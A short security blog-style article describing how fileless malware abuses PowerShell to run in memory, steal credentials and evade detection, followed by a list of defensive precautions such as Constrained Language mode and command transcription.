File-less
Malware Is Wreaking Havoc Via PowerShell
Advanced
Volatile Threats (AVTs) also known as the File-less
Malware, is another threat which works directly from the memory. PowerShell
is a major course adapted by the cyber-cons to achieve the attack.
The malware first suspends a malicious code into the target’s
system. Whenever the system is working the code begins to collect the
credentials on the system.
In case of a victimized company, the malicious code had
started gathering the credentials of its employees, along with the
administrator permissions.
The next step it took was to hunt for the most valuable
assets of the organization and beeline them.
The code was too cleverly designed to be spotted by the
company’s security system and the organization was never alerted.
After doing so much damage to the company and its
credibility, the code disappeared without a trace.
These AVTs had surfaced around a year ago, and it works
especially on working on the memory rather than on the hard drive.
The traditional and old-fashioned threat detection systems
would never in a million chances sense that something’s fishy.
PowerShell is the very basic medium they use to employ the
file-less malware attack.
PowerShell lets systems administrators completely automate
the tasks on the servers and computers.
Meaning, if the cyber-cons happen to take control of the
server and computer they could easily get hold of as many permissions as they’d
wish for.
Windows is not a platform PowerShell is limited to.
Microsoft Exchange, IIS and SQL servers also fall into line.
What file-less malware does is that it forces PowerShell to institute
its malicious code into the console and the RAM.
It becomes a “lateral” attack once the code gets executed,
meaning the attack propagates from the central server.
As after the dirty work’s done the malware leaves no traces
behind, traditional security solutions are never able to place what was behind
the attack.
Only heuristic monitoring systems, if run constantly could
help in tracing the attack’s culprit.
Precautionary
Measures Against Fileless Malware
- Disable PowerShell (If it’s not required to administer systems)
- If it can’t be disabled, ensure that you’re using the latest version of it. (PowerShell 5 has better security measures in Windows)
- Only enable specific features of PowerShell via “Constrained Language” mode.
- Enable automatic transcription of commands which will help in making the system suspicious about file-less attacks.
- Employ advanced cyber-security methods such as permanent anti-malware services.
- Do constant research on unknown processes occurring within the system which could generate file-less malware.
